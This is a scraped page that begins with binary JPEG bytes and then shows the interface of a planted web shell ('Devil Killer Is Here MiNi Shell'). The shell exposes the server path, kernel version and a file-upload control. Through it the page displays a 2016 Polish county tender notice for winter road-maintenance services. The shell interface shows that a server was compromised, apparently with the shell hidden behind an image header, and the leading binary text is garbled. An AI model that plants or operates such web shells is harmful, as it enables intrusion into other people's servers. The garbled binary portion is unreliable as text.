JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161017/324692-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.konecki.wrota-swietokrzyskie.pl/zdp' target='_blank'>http://bip.konecki.wrota-swietokrzyskie.pl/zdp</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 324692 - 2016
              z dnia 2016-10-17 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Końskie: Świadczenie usług przy zimowym utrzymaniu dróg (ulic) powiatowych  w systemie interwencyjnym na terenie Powiatu K o n e c k i e g o   w sezonie zimowym 2016 / 2017<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zarząd Dróg Powiatowych w Końskich, krajowy numer identyfikacyjny
              29102012600000, ul.
              ul. Staszica 
              2,
              26200  
              Końskie, woj.
              świętokrzyskie, państwo
              Polska, tel.
              41 375 08 30, e-mail
              , faks
              41 37227 29.
              <br />
              Adres strony internetowej (URL): http://bip.konecki.wrota-swietokrzyskie.pl/zdp<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://bip.konecki.wrota-swietokrzyskie.pl/zdp</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.konecki.wrota-swietokrzyskie.pl/zdp</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Pisemnie , zgodnie z zasadami określonymi w Rozdziale 7 SIWZ<br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Świadczenie usług przy zimowym utrzymaniu dróg (ulic) powiatowych  w systemie interwencyjnym na terenie Powiatu K o n e c k i e g o   w sezonie zimowym 2016 / 2017<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />10<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia (Zadania) jest:
Świadczenie usług przy zimowym utrzymaniu dróg (ulic) powiatowych  w systemie interwencyjnym na terenie Powiatu K o n e c k i e g o   w sezonie zimowym 2016 / 2017

 CZĘŚĆ 1  środek transportowy (nośnik) dla piaskarki P1-J ,pojemność  załadunku  4 m 
                    i pługa jednostronnego . 

Nośnikiem dla tego typu piaskarki i pługa lemieszowego może być środek transportowy o ładowności minimum 12 Mg posiadający dwie osie napędowe .  
Wykonawca usług takimi środkami transportowymi będzie zobowiązany do zamontowania piaskarki w sposób zapewniający bezpieczną pracę i przewóz środkiem transportu . 
Czołownica z pługiem po uprzednim zdemontowaniu zderzaka mocowana będzie do ramy nośnej środka transportowego (nośnik pługa lemieszowego) musi być obciążony, tak aby spełniał wymóg określony powyżej (masy całkowitej ) .

Świadczenie usług przy zimowym utrzymaniu dróg (ulic) powiatowych  w systemie interwencyjnym na terenie Powiatu K o n e c k i e g o   w sezonie zimowym 2016 / 2017

CZĘŚĆ 2  środek transportowy ( nośnik ) dla piaskarki P1-J  pojemność załadunku  
                   4 m i pługa (jednostronnego) lemieszowego

Nośnikiem dla tego typu piaskarki i pługa lemieszowego może być środek transportowy o ładowności minimum 12 Mg posiadający dwie osie napędowe .  
Wykonawca usług takimi środkami transportowymi będzie zobowiązany do zamontowania piaskarki w sposób zapewniający bezpieczną pracę i przewóz środkiem transportu . 
Czołownica z pługiem po uprzednim zdemontowaniu zderzaka mocowana będzie do ramy nośnej środka transportowego (nośnik pługa lemieszowego) musi być obciążony, tak aby spełniał wymóg określony powyżej (masy całkowitej ) .

Świadczenie usług przy zimowym utrzymaniu dróg (ulic) powiatowych  w systemie interwencyjnym na terenie Powiatu K o n e c k i e g o   w sezonie zimowym 2016 / 2017

CZĘŚĆ 3  środek transportowy ( nośnik ) dla piaskarki P1-J  pojemność załadunku
                   4 m i pługa (jednostronnego) lemieszowego 
 
Nośnikiem dla tego typu piaskarki i pługa lemieszowego może być środek transportowy o ładowności minimum 12 Mg posiadający dwie osie napędowe .  
Wykonawca usług takimi środkami transportowymi będzie zobowiązany do zamontowania piaskarki w sposób zapewniający bezpieczną pracę i przewóz środkiem transportu . 
Czołownica z pługiem po uprzednim zdemontowaniu zderzaka mocowana będzie do ramy nośnej środka transportowego (nośnik pługa lemieszowego) musi być obciążony, tak aby spełniał wymóg określony powyżej (masy całkowitej ) .

Świadczenie usług przy zimowym utrzymaniu dróg (ulic) powiatowych  w systemie interwencyjnym na terenie Powiatu K o n e c k i e g o   w sezonie zimowym 2016 / 2017
CZĘŚĆ 4  środek transportowy ( nośnik ) dla piaskarki P1-J  pojemność załadunku 
                   4 m i pługa jednostronnego

Nośnikiem dla tego typu piaskarki i pługa lemieszowego może być środek transportowy o ładowności minimum 10 Mg posiadający dwie osie napędowe .  
Wykonawca usług takimi środkami transportowymi będzie zobowiązany do zamontowania piaskarki w sposób zapewniający bezpieczną pracę i przewóz środkiem transportu . 
Czołownica z pługiem po uprzednim zdemontowaniu zderzaka mocowana będzie do ramy nośnej środka transportowego (nośnik pługa lemieszowego) musi być obciążony, tak aby spełniał wymóg określony powyżej (masy całkowitej ) .

Świadczenie usług przy zimowym utrzymaniu dróg (ulic) powiatowych  w systemie interwencyjnym na terenie Powiatu K o n e c k i e g o   w sezonie zimowym 2016 / 2017

CZĘŚĆ 5  środek transportowy ( nośnik ) dla piaskarki P1-J  pojemność załadunku 
                   4 m i pługa jednostronnego

Nośnikiem dla tego typu piaskarki i pługa lemieszowego może być środek transportowy o ładowności minimum 12 Mg posiadający dwie osie napędowe .  
Wykonawca usług takimi środkami transportowymi będzie zobowiązany do zamontowania piaskarki w sposób zapewniający bezpieczną pracę i przewóz środkiem transportu . 
Czołownica z pługiem po uprzednim zdemontowaniu zderzaka mocowana będzie do ramy nośnej środka transportowego (nośnik pługa lemieszowego) musi być obciążony, tak aby spełniał wymóg określony powyżej (masy całkowitej ) .

Świadczenie usług przy zimowym utrzymaniu dróg (ulic) powiatowych  w systemie interwencyjnym na terenie Powiatu K o n e c k i e g o   w sezonie zimowym 2016 / 2017

   CZĘŚĆ 6  środek transportowy ( nośnik ) dla pługa lemieszowego jednostronnego.

Nośnikiem dla pługa lemieszowego (jednostronnego) będzie środek transportowy :
ciągnik rolniczy o mocy silnika min. 80,00 kW z tuzem (ramieniem) przednim przystosowanym do montażu pługa lemieszowego jednostronnego 

Świadczenie usług przy zimowym utrzymaniu dróg (ulic) powiatowych  w systemie interwencyjnym na terenie Powiatu K o n e c k i e g o   w sezonie zimowym 2016 / 2017
CZĘŚĆ 7  ładowarko  koparka  (1 szt.)

Wymagana jest koparko  ładowarka na podwoziu kołowym o pojemności łyżki o pojemności załadunku nie mniejsza niż 1,0 m .
Wykonawca usług w okresie zimowym zobowiązany będzie do :
a) załadunku materiałów (mieszanki piasku z solą , piasku lub soli),
b) wykonania mieszanki piasku z solą (materiały będą sukcesywnie dostarczane do 
    Obwody Drogowego)
c) hałdowanie materiałów na składowisko.
Ponadto w razie wystąpienia takiej konieczności może być wykorzystana przy załadunku śniegu nagromadzonego przy ulicach powiatowych na środki transportu, a także przy odśnieżaniu dróg . 

Świadczenie usług przy zimowym utrzymaniu dróg (ulic) powiatowych  w systemie interwencyjnym na terenie Powiatu K o n e c k i e g o   w sezonie zimowym 2016 / 2017

CZĘŚĆ 8  równiarka do odśnieżania dróg (ulic)
 
Zamawiający wymaga aby równiarka wyposażona była w czołowy pług dwustronny. Świadczenie usług obejmować będzie odśnieżanie dróg w okresie wystąpienia obfitych opadów śniegu nagromadzonego przy krawędzi jezdni w kierunku rowu przydrożnego , usuwania z jezdni błota pośniegowego .     

Świadczenie usług przy zimowym utrzymaniu dróg (ulic) powiatowych  w systemie interwencyjnym na terenie Powiatu K o n e c k i e g o   w sezonie zimowym 2016 / 2017

CZĘŚĆ 9  równiarka do odśnieżania dróg ( ulic )
 
Zamawiający wymaga aby równiarka wyposażona była w czołowy pług dwustronny. Świadczenie usług obejmować będzie odśnieżanie dróg w okresie wystąpienia obfitych opadów śniegu nagromadzonego przy krawędzi jezdni w kierunku rowu przydrożnego , usuwania z jezdni błota pośniegowego .  

Świadczenie usług przy zimowym utrzymaniu dróg (ulic) powiatowych  w systemie interwencyjnym na terenie Powiatu K o n e c k i e g o   w sezonie zimowym 2016 / 2017   

CZĘŚĆ 10  spycharka do odśnieżania dróg.
 
Wymagana jest spycharka z silnikiem o mocy powyżej 50 kM . Usługi odśnieżania świadczone będą wówczas gdy będące w dyspozycji zamawiającego pługi odśnieżne zamontowane na środkach transportu nie będą w stanie zapewnić utrzymania przejezdności dróg, bądź tworzenia się zasp śnieżnych na drogach .

2.2 Zamówienie na świadczenie usług przy zimowym utrzymaniu dróg w sezonie zimowym 2016/2017 z uwagi na zróżnicowanie wymagań w stosunku do środków transportowych  nośników piaskarek z pługami i pługów jak również dla jednostek sprzętowych zamawiający podzielił na części .
2.4 Zamawiający przewiduje okres świadczenia usług ( uzależniony od warunków atmosferycznych )  
      od dnia 1 listopada 2016 r. do dnia 15 kwietnia 2017 r.

      System interwencyjny utrzymania zimowego dróg oznacza , że: 
      - Wykonawca, zobowiązany będzie świadczyć usługi na wezwanie telefoniczne,  podstawiając jednostkę 
        sprzętową do dyspozycji zamawiającego w przeciągu dwóch godzin od czasu wezwania ,
      - Zamawiający nie zapewnia ośmiogodzinnego czasu zatrudnienia w ciągu doby, jak  również ciągłości 
        świadczenia usług. Przy sprzyjających warunkach atmosferycznych,  przy których nie będzie zachodzić 
        potrzeba odśnieżania bądź łagodzenia skutków śliskości na nawierzchniach dróg , zamawiający może 
        czasowo zawiesić obowiązek świadczenia usług ,
      - Za okres czasowego zawieszenia obowiązku świadczenia usług, wykonawca nie będzie otrzymywać od 
         zamawiającego żadnego wynagrodzenia.

   
UWAGA: W przypadku udzielenia zamówienia, Wykonawca będzie zobowiązany do wyrażenia zgody na wyposażenie nośników w urządzenia do przekazywania danych telemetrycznych (zintegrowany moduł GPS/GPRS wraz z czujnikami) dotyczy Części 1 - 5

2.5 Wykonawca świadczący usługi przy zimowym utrzymaniu dróg w systemie interwencyjnym musi być 
     przygotowany do  :
-   świadczenia usług w godzinach od 3:00 do 22:00 we wszystkie dni tygodnia nie  wyłączając dni ustawowo 
    wolnych od pracy a także niedziel i świąt.
-   świadczenia usług w przeciągu całej doby  w przypadku wystąpienia obfitych opadów śniegu, zwiewania 
    śniegu powodującego tworzenie się zasp, stanowiących utrudnienie ograniczenia w ruchu drogowym.
-   Wykonawcom świadczącym usługi środkami transportowymi, zamawiający na okres świadczenia usług 
    przekaże nieodpłatnie posiadane pługi i piaskarki, które wykonawcy własnym staraniem pod nadzorem 
    pracownika Obwodu Drogowego zamontują na środki transportowe w sposób umożliwiający bezpieczne 
    wykonanie usług. Montaż pługów i piaskarek musi być wykonywany pod nadzorem pracownika Obwodu 
    Drogowego w Końskich . Wykonawca będzie odpowiedzialny w pełnym zakresie za użytkowanie 
    i konserwację przekazanego sprzętu (piaskarkę , pługa) i zobowiązany będzie po zakończeniu akcji 
    zimowej do zwrotu sprzętu w stanie nie gorszymy technicznie jak przy przekazaniu. Na okoliczność 
    przekazania i odbioru zostanie sporządzony protokół . 
-   Wykonawcy zobowiązani są  utrzymywać w stałej gotowości technicznej własne środki transportowe, 
    przekazane przez zamawiającego pługi i piaskarki . Wykonawcy świadczący usługi usuwania oblodzeń 
    /śliskości na nawierzchni dróg/ ulic - we własnym zakresie dokonuję zakupu oleju napędowego do silnika 
    piaskarki. W przypadku awarii nośnika pługa bądź nośnika piaskarki i pługa wymagającego okresu 
    naprawy powyżej 48 godzin, wykonawca musi zapewnić zastępczy nośnik o parametrach zbliżonych do 
    nośnika uszkodzonego . W przypadku awarii ładowarki, wykonawca usług zobowiązany jest podstawić w 
    ciągu 3 godzin sprawną koparko  ładowarkę .  W przypadku awarii piaskarki lub pługa wykonawca jest 
    zobowiązany do usunięcia awarii w ciągu 48 godzin po upływie określonego czasu wykonawca musi 
    zapewnić zastępczą piaskarkę i/lub pług  .

Usługi świadczone środkiem zastępczym realizowane będą wg stawek za świadczenie usług określonych w umowie.

2.6 Zamawiający w załączonych do specyfikacji istotnych warunków zamówienia  szczegółowych 
      specyfikacjach technicznych 
D-10.10.01b  odśnieżanie dróg
D-10.10.01c  zwalczanie śliskości zimowej na drogach 
      zawarł szczegółowe informacje dotyczące :
-    wymagań w odniesieniu do nośników pługów, piaskarek i pługów a także jednostek  sprzętowych 
     koparko-ładowarki , równiarki , spycharki ,
-    zasady świadczenia usług związanych z zimowym utrzymaniem dróg (ulic) powiatowych,
-    obowiązki kierowców, operatorów obsługujących jednostki sprzętowe i środki transportowe 
     przystosowane do świadczenia usług ,
-    warunki rozliczeń należności za świadczone usługi, częstotliwość rozliczeń okresowych z wymaganymi 
    dokumentami a także przypadki upoważniające zamawiającego do naliczania kar umownych .
2.7 Na okres sezonu zimowego w Obwodzie Drogowym w Końskich przy ul. Warszawskiej 56 utworzony 
    zostanie ośrodek dyspozycyjny zimowego utrzymania dróg w którym :
-   pełnione będą dyżury przez wyznaczonych pracowników Zarządu Dróg Powiatowych ,
-   wydawane będą dyspozycje wykonawcom świadczących usługi ,
-   poświadczane będą świadczone usługi, oraz prowadzona dokumentacja zimowego 
     utrzymania ,
-   odbywać się będzie załadunek materiałów na piaskarki .
2.8 Kontrole świadczonych usług, a także prawidłowości ich dokumentowania przeprowadzać będą  
    upoważnieni pracownicy Zarządu Dróg.
2.9 Zarząd Dróg Powiatowych w Końskich posiada następujące ilości piaskarek i pługów, które po  
    zamontowaniu na odpowiednie środki transportowe  nośniki, służyć będą do prowadzenia prac 
    związanych z zimowym utrzymaniem dróg / ulic :

    Piaskarki do rozsypywania materiałów łagodzących skutki śliskości zimowej na nawierzchni dróg / ulic 
-   piaskarki typ P1-J o pojemności  załadunku 4 m -  5 szt.
    Pługi odśnieżne montowane na środkach transportowych
-   pługi jednostronne  6 szt. , w tym 5 szt. zamontowanych zostanie na nośnikach 
     piaskarek.

2.10 Zamawiający w oparciu o faktyczny zakres usług świadczonych przy zimowym utrzymaniu dróg w 
      minionych sezonach zimowych (uzależnione jest od panujących warunków zimowych) przewiduje, że w    
      sezonie zimowym 2016/2017 zakres usług przez poszczególne jednostki objęte postępowaniem 
      przetargowym oscylować mogą w ilościach  

- środek transportowy jako nośnik pługa i piaskarki 

            przy zwalczaniu śliskości zimowej                         16000 km
            przy odśnieżaniu                                                   -    3000 km
						                        Razem : 19000 km

-   środek transportowy nośnik pługa lemieszowego   300 godzin 

-   koparko-ładowarka (załadunek materiałów na piaskarki, wykonywanie mieszanki  - około 800 godzin .
-   sprzęt ciężki przy odśnieżaniu 
       równiarka  150 godzin  
       spycharka 150 godzin.

Określone powyżej przewidywania zakresu usług w zależności od panujących warunków zimowych    w sezonie zimowym mogą okazać się w rzeczywistości mniejsze lub mogą ulec zwiększeniu . 
Wykonawca nabywać będzie prawo do zapłaty należności za faktyczną  ilość  wykonanych usług . 

Szczegółowy opis przedmiotu zamówienia (Zadania) zawarty jest : w SST

2.11 Zamawiający nie przewiduje możliwości udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt . 6 i 7   
     ustawy.
2.12 	Zamawiający zastrzega obowiązek osobistego wykonania przez wykonawcę poszczególnych Części 1,2,3,4,5,6,7,8,9,10 .
2.13 	Wymóg zatrudnienia na umowę o pracę. 
Zamawiający stosownie do art. 29 ust. 3a ustawy, wymaga aby wykonawca przez cały okres realizacji zamówienia zatrudniał dla każdej Części -minimum  1 osobę w pełnym wymiarze czasu pracy na umowę o pracę,  wykonujące czynności w zakresie realizacji przedmiotu zamówienia(wykonywanie usług związanych z przedmiotem zamówienia) , których wykonanie polega na wykonywaniu pracy w sposób określony wart. 22 § 1* ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy, zostały zatrudnione przez wykonawcę lub podwykonawcę na podstawie umowy o pracę. 
Wykonawca zatrudni  wyżej wymienione osoby na okres realizacji zamówienia. 
W przypadku rozwiązania stosunku pracy przed zakończeniem tego okresu, zobowiązuje się do niezwłocznego zatrudnienia na to miejsce innej osoby. 
*art. 22 § 1 ustawy z dnia 26 czerwca 1976 r. -Kodeks pracy: Przez nawiązanie stosunku pracy pracownik zobowiązuje się do wykonywania pracy określonego rodzaju na rzecz pracodawcy i pod jego kierownictwem oraz w miejscu i czasie wyznaczonym przez pracodawcę, a pracodawca -do zatrudniania pracownika za wynagrodzeniem. 
2.13.1. 	Rodzaj czynności niezbędnych do realizacji zamówienia, których dotyczą wymagania zatrudnienia na podstawie umowy o pracę przez wykonawcę osób wykonujących czynności w trakcie realizacji zamówienia: 
a) czynności bezpośrednio związane z wykonywaniem usług objętych przedmiotem zamówienia
2.13.2. Uprawnienia zamawiającego w zakresie kontroli spełniania przez wykonawcę wymagań, o których mowa wart. 29 ust. 3a, oraz sankcji z tytułu niespełnienia tych wymagań: 
2.13.2.1. Sposób dokumentowania zatrudnienia ww. osób.
 a)	Wykonawca w terminie do 10 dni licząc od dnia podpisania umowy będzie zobowiązany do przedstawienia zamawiającemu dokumentów potwierdzających zatrudnienie wymaganych  osób (kopię umów o pracę), a także oświadczenie ww. osób, że są zatrudnione na podstawie umowy o pracę w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy z uwzględnieniem minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę przez cały okres realizacji przedmiotu zamówienia, 
b)	Sankcje z tytułu niespełnienia wymagań w zakresie zatrudnienia. 
W przypadku nie przedstawienia w terminie informacji, o której mowa w pkt. 2.13.2.1 a) SIWZ wykonawca zapłaci zamawiającemu karę w wysokości 5 000,00 PLN. 
W przypadku dwukrotnego nie wywiązania się z obowiązku wskazanego w pkt. 2.13.2.1 a) SIWZ lub zmiany sposobu zatrudnienia osób wskazanych w ofercie, zamawiający ma prawo od umowy odstąpić.
2.14  Pozostałe warunki dotyczące realizacji zamówienia zostały określone we wzorze umowy stanowiącym 
      Załącznik Nr 2 do SIWZ.
<br /><br /><b>II.5) Główny kod CPV: </b>90620000-9<br /><b> Dodatkowe kody CPV:</b>90630000-2,
                98300000-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
